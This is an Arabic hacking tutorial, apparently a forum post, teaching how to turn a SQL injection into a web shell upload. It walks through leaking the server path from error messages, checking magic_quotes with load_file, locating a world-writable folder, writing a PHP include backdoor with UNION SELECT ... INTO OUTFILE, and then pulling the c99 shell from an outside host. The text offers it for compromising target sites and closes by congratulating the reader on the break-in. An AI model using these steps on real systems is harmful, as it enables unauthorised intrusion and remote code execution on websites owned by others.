السلام عليكم و رحمة الله تعلى و بركاته
-أرجو أن تكونوا في تمام الصحة و العافية-

في الكثير من الحالات نستطيع حقن الموقع لكن لا نجد الأدمن و الباس
أو يكون الباس غير قابل للكسر
أو نجدها ولا نجد مسار لوحة التحكم
أو يكون الموقع محمي بجدار ناري

أردت أن أضيف لكم معلومة ( للذين لا يعرفونها )
نستطيع أن نرفع شل من حقنة السيكول
و الطريقة كالتالي :
أولا :
يجب أن نعرف مسارنا على السرفر
و يجب أن يكون magic quotes=OFF الماجيك كويتس أوف
--------------------------------------------------------------------
بعدما استخرجنا عدد الأعمدة و عرفنا المصاب منها
-------------------------------------------------------------------
لنعرف مسارنا عى السرفر ستعمل نفس طريقة معرفة الموقع مصاب بثغرة sql أي نضيف '
و سيضهر لنا مسارنا على السرفر مع جملة الخطأ
-----------------
مثال:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/dudi/public_html/katava.php on line 2
هذه جملة خطأ
ومسارنا فيها..
و هو /home/dudi/public_html/ طبعا لا نحتسب الصفحة الأخيرة ي الصابة لأنها ليست ب مجلد
المهم نحفظ المسار و نتابع
---------------
الآن نأتي لكيفية معرفة الmagic quotes on أو off
لهذا الغرض نستبدل أحد الأعمدة المصابة طبعا في أمر معرفة الأعمدة المصابة
ب load_file('/')
أي سيكون الإستغلال هكذا
نفترض أن عدد الأعمدة هو 9 و العمود 4 مصاب
http://www.target.com/file.php?id=-1...39,5,6,7,8,9
و نرى
إذا ضهرت الصفحة نفسها التي تضهر عند طلب الأعمدة المصابة فهذا يعني أن الmagic quotes off
و نستطيع مواصلة عملنا
أما إذا كان ال magic quotes on
فسوف يضهر لنا خطأ سيكول ولا نستطيع رفع الشل في هذه الحالة
------------------------------
طيب ضهر لنا الmagic quotes off ماذا نفعل ؟
-----------------------------
نبحث عن أي شيئ مصرح بتصريح 777
-----------------------------
و ذلك بمحاولة الحصول على مسار أي صورة أو فيديو أو صوت في الصفحة الحالية
مثلا هذا مسار صورة www.target.com/images/image.jpg
أي سيكون مسار الملف المصرح هو /images/
الذي يأتي بعد مسارنا على السرفر طبعا
---------------------------------
نضع هذا الكود في مكان العمود المصاب الذي هو 4 في حالتنا هذه
'<?include("$iraq"); ?>'
و نضيف هذا الأمر في آخر السطر
into+outfile+
ثم نضيف مسارنا على السرفر الذي هو في هذه الحالة
home/dudi/public_html/
ثم نضيف مسار الملف المصرح ب777
/images/
ثم اسم الملف المصاب المراد رفعه بإمتداد php
مثلا example.php
------------------
ليكون الاستغلال كتالي

PHP CODE
www.target.com/file.php?id=-1+union+select+1,2,3,'<?include("$iraq"); ?>',5,6,7,8,9+into+outfile"/home/dudi/public_html/images/example.php

الآن تم إشائ الملف المقصود و هو هنا

www.target.com/images/example.php
الآن المرحلة الأخيرة هي رفع الشل على صيغة txt

وذلك بالتالي
كود PHP:
http://www.target.com/images/example...xt.tc/c99.txt?
طبعا http://c99.txt.tc/c99.txt
هو مسار الشل بصيغة txt مرفوع جاهز
و ألف مبروك على الإختراق-----